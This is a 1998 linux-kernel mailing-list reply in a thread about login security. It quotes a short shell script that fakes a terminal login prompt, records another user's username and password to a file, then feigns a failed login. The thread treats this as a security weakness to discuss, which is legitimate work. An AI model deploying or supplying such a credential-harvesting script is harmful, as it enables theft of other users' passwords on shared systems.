Re: Linux login security approaches

ralf@uni-koblenz.de
Tue, 15 Dec 1998 04:48:40 +0100


On Sun, Dec 13, 1998 at 04:25:24PM +0100, jens@pinguin.conetix.de wrote:

> On Sat, Dec 12, 1998 at 06:13:05AM +0100, ralf@uni-koblenz.de wrote:
>
> >> What about just starting (as evil_user, who has an account) the following,
> >> hiding behind a corner, and wait for another user?
> >>
> >> #!/bin/sh
> >> #
> >> echo -n "`uname -n` login: "
> >> read LOGIN
> >> echo -n "Password: "
> >> read PW
> >> echo $LOGIN $PW >> ~/sneaked_passwords.txt
> >> chmod 0600 ~/sneaked_passwords.txt
> >> echo "Login incorrect"
> >> sleep 1
> >> logout
> >>
> >> (of course, this has to be a text terminal)
> >
> > A shell script like that was included with ``UNIX Programmers Workbench'',
> > volume 2, as delivered with Edition 7 ...
>
> I'll have a look into this book in our library if they have it, thanks. :)

You actually can download most of Volume 1 and 2 from
http//cm.bell-labs.com:/7thEdMan/. This report is missing as I remember
and it's a _big_ pain in the as to make a current *roff formatter eat their
sources.

Ralf

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/